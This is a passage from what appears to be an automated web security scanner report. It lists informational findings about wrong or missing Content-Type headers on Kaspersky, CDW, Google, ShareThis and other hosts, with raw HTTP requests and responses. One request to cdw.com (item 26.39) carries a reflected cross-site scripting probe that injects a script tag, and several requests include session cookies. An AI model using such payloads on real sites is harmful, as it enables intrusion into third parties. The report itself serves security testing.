Host: support.kasperskyamericas.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESSdede027f997e7b165588bf3c431a00ec=q25voncnf657rngjhpsai5d5p6; has_js=1; s_cc=true; gpv_pageName=Support%20%7C%20Corporate%20Support%20%7C%20Contact%20Corporate%20Support; s_nr=1315144606318-New; s_sq=%5B%5BB%5D%5D; __utma=38548641.275004050.1315144606.1315144606.1315144606.1; __utmb=38548641.2.10.1315144606; __utmc=38548641; __utmz=38548641.1315144606.1.1.utmcsr=usa.kaspersky.com|utmccn=(referral)|utmcmd=referral|utmcct=/about-us/contact-us; __utmv=38548641.anonymous%20user|1=User%20roles=anonymous%20user=1

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 13:59:30 GMT
Server: Apache
Last-Modified: Mon, 16 May 2011 14:49:54 GMT
ETag: "1ba6-4a365c4b40880"
Accept-Ranges: bytes
Content-Length: 7078
Cache-Control: max-age=1209600
Expires: Sun, 18 Sep 2011 13:59:30 GMT
Content-Type: text/plain; charset=utf-8

...... ..........F...........(.......00..........V... ..............(... ...@.........................................................................................................................
...[SNIP]...

26.31. http://techtarget-www.baynote.net/baynote/tags3/common previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://techtarget-www.baynote.net
Path:	/baynote/tags3/common

Issue detail

The response contains the following Content-type statement:

Content-Type: text/javascript;charset=ISO-8859-1

The response states that it contains script. However, it actually appears to contain HTML.

Request

GET /baynote/tags3/common?customerId=techtarget&code=www&timeout=30000 HTTP/1.1
Host: techtarget-www.baynote.net
Proxy-Connection: keep-alive
Referer: http://searchsecurity.techtarget.com/tip/Addressing-the-dangers-of-JavaScript-in-the-enterprise
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: BNServer
Cache-Control: public,max-age=27800,must-revalidate
Content-Type: text/javascript;charset=ISO-8859-1
Vary: Accept-Encoding
Date: Sun, 04 Sep 2011 12:15:09 GMT
Content-Length: 80021

baynote_globals.TagsURLPrefix="/baynote/tags3/";baynote_globals.CustomScript="customScript";baynote_globals.GuideSet="GuideSet";baynote_globals.ScriptWebapp="r";baynote_globals.Sc
...[SNIP]...

26.32. http://urls.api.twitter.com/1/urls/count.json previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://urls.api.twitter.com
Path:	/1/urls/count.json

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain

The response states that it contains plain text. However, it actually appears to contain CSS.

Request

GET /1/urls/count.json HTTP/1.1
Host: urls.api.twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
ETag: "6599c6d212c5eb6e41d800b7f8bf7397:1284511129"
Last-Modified: Wed, 15 Sep 2010 00:38:49 GMT
Accept-Ranges: bytes
Content-Length: 95
Content-Type: text/plain
Date: Sun, 04 Sep 2011 14:04:09 GMT
Connection: close
X-N: S

twttr.receiveCount({"errors":[{"code":48,"message":"Unable to access URL counting services"}]})

26.33. http://usa.kaspersky.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://usa.kaspersky.com
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=iso-8859-1

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /favicon.ico HTTP/1.1
Accept: */*
Accept-Encoding: gzip
User-Agent: Mozilla/5.0 (compatible; Google Desktop/5.9.1005.12335; http://desktop.google.com/)
Host: usa.kaspersky.com
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Server: Apache
Content-Type: text/html; charset=iso-8859-1
Content-Length: 45
Date: Sun, 04 Sep 2011 12:14:07 GMT
X-Varnish: 1163036524 1163030951
Age: 219
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: HIT

The requested file favicon.ico was not found.

26.34. http://usa.kaspersky.com/sites/default/files/kaspersky_usatheme_favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://usa.kaspersky.com
Path:	/sites/default/files/kaspersky_usatheme_favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=UTF-8

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /sites/default/files/kaspersky_usatheme_favicon.ico HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; gpv_pageName=Homepage; s_nr=1315138484684-New; s_sq=%5B%5BB%5D%5D; __utma=205612169.764119128.1315138485.1315138485.1315138485.1; __utmb=205612169.1.10.1315138485; __utmc=205612169; __utmz=205612169.1315138485.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_vi=[CS]v1|2731B5C785013339-4000010CE01E480D[CE]; slider_session=yes

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Wed, 04 Aug 2010 18:23:15 GMT
ETag: "3128478-1ba6-48d0386edeac0"
Cache-Control: max-age=1209600
Expires: Sun, 18 Sep 2011 11:56:57 GMT
Content-Type: text/plain; charset=UTF-8
Content-Length: 7078
Date: Sun, 04 Sep 2011 12:20:06 GMT
X-Varnish: 1163045996 1163013922
Age: 1389
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: HIT

...... ..........F...........(.......00..........V... ..............(... ...@.........................................................................................................................
...[SNIP]...

26.35. http://usa.kaspersky.com/system/lightbox2/filter-xss previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://usa.kaspersky.com
Path:	/system/lightbox2/filter-xss

Issue detail

The response contains the following Content-type statement:

Content-Type: text/javascript; charset=utf-8

The response states that it contains script. However, it actually appears to contain plain text.

Request

POST /system/lightbox2/filter-xss HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
Referer: http://usa.kaspersky.com/store/kaspersky-store
Content-Length: 30
Origin: http://usa.kaspersky.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: application/json, text/javascript, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2731B5C785013339-4000010CE01E480D[CE]; intcamp=INT1673886; op646kaspersky_us_storepagegum=a01603h0892794r05t3df84d5; NO_CACHE=Y; slider_session=yes; ev5=far%2Bhelp%2Bvirus; s_cc=true; __utma=205612169.764119128.1315138485.1315138485.1315138485.1; __utmb=205612169.9.9.1315139091566; __utmc=205612169; __utmz=205612169.1315138485.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); gpv_pageName=Store%20%7C%20Home%20Users%20%7C%20Kaspersky%20Store; s_nr=1315139100971-New; s_sq=kaspersky-usa%3D%2526pid%253DStore%252520%25257C%252520Home%252520Users%252520%25257C%252520Kaspersky%252520Store%2526pidt%253D1%2526oid%253Dfunctiononclick(event)%25257B%252524('%252523pure-users-3y-prices').show()%25253B%252524('%252523pure-users-2y-prices').hide()%25253B%252524('%252523pure-%2526oidt%253D2%2526ot%253DDIV

string=&allowed_tags=undefined

Response

26.36. http://wd.sharethis.com/api/getCount2.php previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://wd.sharethis.com
Path:	/api/getCount2.php

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain script.

Request

Response

26.37. http://wd.sharethis.com/api/sharer.php previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://wd.sharethis.com
Path:	/api/sharer.php

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=utf-8

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /api/sharer.php HTTP/1.1
Host: wd.sharethis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Sun, 04 Sep 2011 14:04:54 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Content-Length: 27

Destination Cannot be empty

26.38. https://ws.sharethis.com/api/getCount2.php previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	https://ws.sharethis.com
Path:	/api/getCount2.php

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /api/getCount2.php HTTP/1.1
Host: ws.sharethis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

26.39. http://www.cdw.com/shop/search/hubs/Products/Software/F.aspx previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.cdw.com
Path:	/shop/search/hubs/Products/Software/F.aspx

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=utf-8

The response states that it contains plain text. However, it actually appears to contain HTML.

Request

POST /shop/search/hubs/Products/Software/F.aspx?1d6ea%22%3E%3Cscript%3Eprompt(document.location)%3C/script%3Ed7742b51610=1 HTTP/1.1
Host: www.cdw.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
X-MicrosoftAjax: Delta=true
Cache-Control: no-cache, no-cache
Content-Type: application/x-www-form-urlencoded; charset=utf-8
Referer: http://www.cdw.com/shop/search/hubs/Products/Software/F.aspx?1d6ea%22%3E%3Cscript%3Eprompt(document.location)%3C/script%3Ed7742b51610=1
Content-Length: 33130
Cookie: 3039D25F6DEC4E47B474C3FC71519575=A8A8F83D13EA4F8B917AA5F211762060=75165C11D5234F7D9CF742C32889F929&BA9AA5C91598458BA251A10B273627B6=A04B0B4F3A184E6F9B2F6C8FA16E6CB4&813F9F7AA3924BBEB886AA375A9E8321=&925E59B88B6B46AEB9CB495BFF4D7D2C=&806B512B4E7948E3A3481CCA3CB230A5=&ECDC4F474BB24C7FB7CF910AF2E97643=%2fshop%2fsearch%2fhub.aspx%3fwclss%3dF%261d6ea%2522%253e%253cscript%253eprompt%2528document.location%2529%253c%252fscript%253ed7742b51610%3d1; cmTPSet=Y; CoreID6=49062000420513151483393&ci=90087388; 90087388_clogin=l=1315148339&v=7&e=1315150139361
Pragma: no-cache

ScriptManager1=ScriptManager1%7Cctl04%24Content_ctrlContentSpotlighting%24btn&__EVENTTARGET=ctl04%24Content_ctrlContentSpotlighting%24btn&__EVENTARGUMENT=&__CDWVSTATE=H4sIAAAAAAAEAO29B2AcSZYlJi9tynt%2
...[SNIP]...

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 16048
Content-Type: text/plain; charset=utf-8
P3P: CP="CAO DSP DEVa TAIa OUR BUS UNI FIN COM NAV INT STA",
X-Powered-By: ASP.NET
Date: Sun, 04 Sep 2011 14:58:22 GMT
Connection: close

3213|updatePanel|ctl04_Content_ctrlContentSpotlighting_upContSpot|
<span id="ctl04_Content_ctrlContentSpotlighting_lblTitle" class="learnMore"><h5>Learn More</h5></span>
<div id="rel
...[SNIP]...

26.40. http://www.facebook.com/extern/login_status.php previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.facebook.com
Path:	/extern/login_status.php

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=utf-8

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

Response

26.41. http://www.google.com/mbd previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.google.com
Path:	/mbd

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=UTF-8

The response states that it contains HTML. However, it actually appears to contain CSS.

Request

GET /mbd?q=site:cloudscan.me&hl=en&biw=1049&bih=910&prmd=ivns&mbtype=29&resnum=1&tbo=1&docid=12280479584833193901&usg=c349&zx=1315144466797 HTTP/1.1
Host: www.google.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=site%3Axss.cx+usa.kapersky.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PREF=ID=26ea7fef0a6cf43b:U=f5d01e2b2ce2e5f3:TM=1314742576:LM=1314798155:S=dIZk57crg6QHX-5i; NID=50=XU0IQAZklWhyhWdlymBvdCxVkSIFK9aUlYUQMFi34UxO1ecYTEfO4ZrKByNclFfOyvF5AaGDzivPGm42OGxJA3ND_Gd1jskTnbkzYzvsb4F6P5IHltVNnazrs6Pi8hSq

Response

HTTP/1.1 200 OK
Cache-Control: private, max-age=0
Content-Type: text/html; charset=UTF-8
Date: Sun, 04 Sep 2011 13:53:49 GMT
Expires: -1
Server: gws
Content-Length: 7233
X-XSS-Protection: 1; mode=block

google.Toolbelt.ascrs('.tbo #ssb #tbp{background-position:-105px -74px}.tbt{margin-bottom:1.2em;font-size:82%}.tbos{padding-top:2px;font-weight:bold}.tbou{padding-top:2px;padding-left:1em}.tbotu{color
...[SNIP]...

26.42. http://www.google.com/search previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.google.com
Path:	/search

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=UTF-8

The response states that it contains HTML. However, it actually appears to contain unrecognised content.

Request

GET /search?sourceid=chrome&ie=UTF-8&q=site%3Axss.cx+usa.kapersky.com HTTP/1.1
Host: www.google.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Avail-Dictionary: StnTz5pY
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PREF=ID=26ea7fef0a6cf43b:U=f5d01e2b2ce2e5f3:TM=1314742576:LM=1314798155:S=dIZk57crg6QHX-5i; NID=50=adjUfKLVPxXBppHUZY480YLDjE2TXEqeAmIjGpHBlcaVF6wbQm-JEpHPhJt98LMnhozRMS6AaEQsoCz_w7ME2nqO3ThcslHhnVrL_zzIP2KvvGHfuHPNv9mBijj8N4Cd

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 12:33:26 GMT
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html; charset=UTF-8
Server: gws
X-XSS-Protection: 1; mode=block
Content-Length: 25028

BfyINKgQ....S.......d..i...W......s#...site:xss.cx usa.kapersky.com.7$..5FnBjTs3tIo_OiALdh52iCg",getEI:function(a){var b;while(a&&!(a.getAttribute&&(b=a.getAttribute("eid"))))a=a.parentNode;return b||
...[SNIP]...

26.43. http://www.networkworld.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.networkworld.com
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=UTF-8

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
Host: www.networkworld.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: Apache=50.23.123.106.1315147426262493; s_pers=%20s_pv%3Dhomepage%253AHomepage%7C1315149449865%3B; __utma=219500550.255216774.1315147627.1315147627.1315147627.1; __utmb=219500550.2.10.1315147627; __utmz=219500550.1315147627.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; lastTopStoryBlock=3; __utmc=219500550; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B%20s_ppv%3D20%3B; mobify=0; idglg_ref_domain=fakereferrerdominator.com; breakingnewsfilter=breakingnews-all

Response

HTTP/1.1 200 OK
ETag: "500107-47e-478af93ac5fc0"
Server: Apache/2.2.3 (CentOS)
Last-Modified: Thu, 19 Nov 2009 01:49:59 GMT
Accept-Ranges: bytes
Cteonnt-Length: 1150
Cneonction: close
Content-Type: text/plain; charset=UTF-8
Content-Length: 1150
Vary: Accept-Encoding
Expires: Sun, 04 Sep 2011 14:47:06 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 04 Sep 2011 14:47:06 GMT
Connection: close

............ .h.......(....... ..... ..................................................Y...Y...Y...Y..........................jjj.jjj.jjj.jjj.jjj.jjj..iU...y...y..iU.jjj.jjj.jjj.jjj.jjj.jjj.jjj.......
...[SNIP]...

26.44. http://www.scmagazine.com.au/t.ashx previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.scmagazine.com.au
Path:	/t.ashx

Issue detail

The response contains the following Content-type statement:

Content-Type: image/jpeg

The response states that it contains a JPEG image. However, it actually appears to contain a GIF image.

Request

GET /t.ashx?u=&c=268907&s=15&r=http%3a%2f%2fwww.google.com%2f%23sclient%3dpsy%26hl%3den%26tbm%3dnws%26source%3dhp%26q%3d%2522xss.cx%2522%26pbx%3d1%26oq%3d%2522xss.cx%2522%26aq%3df%26aqi%3d%26aql%3d%26gs_sm%3de%26gs_upl%3d4842l5841l1l6289l8l7l0l0l0l0l221l967l2.3.2l7l0%26fp%3d1%26biw%3d1407%26bih%3d931%26bav%3don.2%2cor.r_gc.r_pw.%26cad%3db&n=%2fNews%2fArticle.aspx&q=id%3d268907 HTTP/1.1
Host: www.scmagazine.com.au
Proxy-Connection: keep-alive
Referer: http://www.scmagazine.com.au/News/268907,kaspersky-website-vulnerable-to-xss.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ARPT=NZVLWMSweb2CKIKM; Q291bnRyeQ0K=220; ASP.NET_SessionId=bfnxibaku1orgt45l5q55sbj

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: image/jpeg
Expires: -1
Server: Microsoft-IIS/7.0
X-Powered-By: UrlRewriter.NET 2.0.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Sun, 04 Sep 2011 12:13:26 GMT
Content-Length: 43

GIF89a.............!.......,...........D..;

26.45. http://www.sophelle.com/graphic/cq_logo-250.gif previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.sophelle.com
Path:	/graphic/cq_logo-250.gif

Issue detail

The response contains the following Content-type statement:

Content-Type: image/gif

The response states that it contains a GIF image. However, it actually appears to contain a JPEG image.

Request

GET /graphic/cq_logo-250.gif HTTP/1.1
Host: www.sophelle.com
Proxy-Connection: keep-alive
Referer: http://www.sophelle.com/Products/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: hubspotutk=9c6ca7a5ca1546b9a6b60f57cca70bb6; hubspotvd=9c6ca7a5ca1546b9a6b60f57cca70bb6; hubspotvw=9c6ca7a5ca1546b9a6b60f57cca70bb6; hubspotvm=9c6ca7a5ca1546b9a6b60f57cca70bb6; hsfirstvisit=http%3A%2F%2Fwww.sophelle.com%2F||2011-09-04%2010%3A55%3A54; __utma=227204639.668059565.1315148193.1315148193.1315148193.1; __utmb=227204639.3.10.1315148193; __utmc=227204639; __utmz=227204639.1315148193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); hubspotdt=2011-09-04%2010%3A56%3A01

Response

HTTP/1.1 200 OK
Content-Length: 36615
Content-Type: image/gif
Last-Modified: Sun, 01 Nov 2009 12:24:17 GMT
Accept-Ranges: bytes
ETag: "1bc4783bee5aca1:957"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sun, 04 Sep 2011 14:54:22 GMT

......JFIF.....H.H.... .Exif..MM.*.............................b...........j.(...........1.........r.2...........i...............
....'..
....'.Adobe Photoshop CS4 Macintosh.2009:11:01 07:18:46.......
...[SNIP]...

26.46. http://www.whatisnetwork.com/wp-admin/admin-ajax.php previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.whatisnetwork.com
Path:	/wp-admin/admin-ajax.php

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=UTF-8

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

POST /wp-admin/admin-ajax.php HTTP/1.1
Host: www.whatisnetwork.com
Proxy-Connection: keep-alive
Referer: http://www.whatisnetwork.com/news-events/114520/kaspersky-website-vulnerable-to-xss.html
Content-Length: 44
Origin: http://www.whatisnetwork.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

action=wpp_update&token=e7a8f8b064&id=114520

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 13:54:50 GMT
Server: Apache mod_fcgid/2.3.6 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding,User-Agent
Content-Length: 2
Content-Type: text/html; charset=UTF-8

OK

27. Content type is not specified previous next
There are 12 instances of this issue:

http://chat.livechatinc.net/licence/1019931/button.cgi
https://chat.livechatinc.net/licence/1019931/form_offline_0_en.html
https://chat.livechatinc.net/licence/1019931/open_chat_logo.jpg
https://chat.livechatinc.net/server/images/icons-16x16.png
https://chat.livechatinc.net/server/js/language-en.js
https://chat.livechatinc.net/server/js/livechat.js
http://gis1.livechatinc.com/gis.cgi
http://gis2.livechatinc.com/gis.cgi
http://gis3.livechatinc.com/gis.cgi
http://gis4.livechatinc.com/gis.cgi
http://gis5.livechatinc.com/gis.cgi
http://users.techtarget.com/favicon.ico

Issue description

If a web response does not specify a content type, then the browser will usually analyse the response and attempt to determine the MIME type of its content. This can have unexpected results, and if the content contains any user-controllable data may lead to cross-site scripting or other client-side vulnerabilities.

In most cases, the absence of a content type statement does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing a message body, the application should include a single Content-type header which correctly and unambiguously states the MIME type of the content in the response body.

27.1. http://chat.livechatinc.net/licence/1019931/button.cgi previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://chat.livechatinc.net
Path:	/licence/1019931/button.cgi

Request

GET /licence/1019931/button.cgi?lang=en&groups=1 HTTP/1.1
Host: chat.livechatinc.net
Proxy-Connection: keep-alive
Referer: http://support.kasperskyamericas.com/corporate/live-chat
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __livechat=lc_session%3DS1315144570.6ab74cb2ef%26lc_last_visit%3D1315144638%26lc_visit_number%3D1%26lc_page_view%3D2%26lc_nick%3D%24%26lc_lang%3Den%26lc_chat_number%3D0%26lc_all_invitation%3D0%26lc_ok_invitation%3D0%26lc_last_operator_id%3D%24%26lc_client_version%3D%24%26lc_last_conference_id%3D%24

Response

HTTP/1.1 200 OK
Content-Length: 5943
Connection: Keep-Alive

GIF89a..S........... .!!.''.--....... ...ccc.pp...TSS[ZZ.**.++.......((.......!!."".HH.((.......,,{{{.))...jjj.......$$..........&&.%%.......""...===r.....LLK.''..........'(....--....TTppp.........@
...[SNIP]...

27.2. https://chat.livechatinc.net/licence/1019931/form_offline_0_en.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://chat.livechatinc.net
Path:	/licence/1019931/form_offline_0_en.html

Request

Response

27.3. https://chat.livechatinc.net/licence/1019931/open_chat_logo.jpg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://chat.livechatinc.net
Path:	/licence/1019931/open_chat_logo.jpg

Request

GET /licence/1019931/open_chat_logo.jpg HTTP/1.1
Host: chat.livechatinc.net
Connection: keep-alive
Referer: https://chat.livechatinc.net/licence/1019931/open_chat.cgi?groups=1&s=1&lang=en&dc=SESSdede027f997e7b165588bf3c431a00ec%3Dq25voncnf657rngjhpsai5d5p6%3B%20s_SupportDivison%3DCorporate%2520Support%3B%20has_js%3D1%3B%20s_cc%3Dtrue%3B%20gpv_pageName%3DSupport%2520%257C%2520Corporate%2520Support%2520%257C%2520Open%2520a%2520Support%2520Case%3B%20s_nr%3D1315144694450-New%3B%20s_sq%3D%255B%255BB%255D%255D%3B%20__utma%3D38548641.275004050.1315144606.1315144606.1315144606.1%3B%20__utmb%3D38548641.10.10.1315144606%3B%20__utmc%3D38548641%3B%20__utmz%3D38548641.1315144606.1.1.utmcsr%3Dusa.kaspersky.com%7Cutmccn%3D%28referral%29%7Cutmcmd%3Dreferral%7Cutmcct%3D/about-us/contact-us%3B%20__utmv%3D38548641.anonymous%2520user%7C1%3DUser%2520roles%3Danonymous%2520user%3D1%3Bl%3Dhttp%3A//support.kasperskyamericas.com/corporate/live-chat%3Br%3Dundefined%3Bs%3Dundefined
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __livechat=lc_session%3DS1315144570.6ab74cb2ef%26lc_last_visit%3D1315144651%26lc_visit_number%3D1%26lc_page_view%3D4%26lc_nick%3D%24%26lc_lang%3Den%26lc_chat_number%3D0%26lc_all_invitation%3D0%26lc_ok_invitation%3D0%26lc_last_operator_id%3D%24%26lc_client_version%3D%24%26lc_last_conference_id%3D%24

Response

HTTP/1.1 200 OK
Content-Length: 3698
Connection: Keep-Alive

......JFIF.............;CREATOR: gd-jpeg v1.0 (using IJG JPEG v62), quality = 90
...C......................
.....
...
.................................C....... .. .................................
...[SNIP]...

27.4. https://chat.livechatinc.net/server/images/icons-16x16.png previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://chat.livechatinc.net
Path:	/server/images/icons-16x16.png

Request

GET /server/images/icons-16x16.png HTTP/1.1
Host: chat.livechatinc.net
Connection: keep-alive
Referer: https://chat.livechatinc.net/licence/1019931/open_chat.cgi?groups=1&s=1&lang=en&dc=SESSdede027f997e7b165588bf3c431a00ec%3Dq25voncnf657rngjhpsai5d5p6%3B%20s_SupportDivison%3DCorporate%2520Support%3B%20has_js%3D1%3B%20s_cc%3Dtrue%3B%20gpv_pageName%3DSupport%2520%257C%2520Corporate%2520Support%2520%257C%2520Open%2520a%2520Support%2520Case%3B%20s_nr%3D1315144694450-New%3B%20s_sq%3D%255B%255BB%255D%255D%3B%20__utma%3D38548641.275004050.1315144606.1315144606.1315144606.1%3B%20__utmb%3D38548641.10.10.1315144606%3B%20__utmc%3D38548641%3B%20__utmz%3D38548641.1315144606.1.1.utmcsr%3Dusa.kaspersky.com%7Cutmccn%3D%28referral%29%7Cutmcmd%3Dreferral%7Cutmcct%3D/about-us/contact-us%3B%20__utmv%3D38548641.anonymous%2520user%7C1%3DUser%2520roles%3Danonymous%2520user%3D1%3Bl%3Dhttp%3A//support.kasperskyamericas.com/corporate/live-chat%3Br%3Dundefined%3Bs%3Dundefined
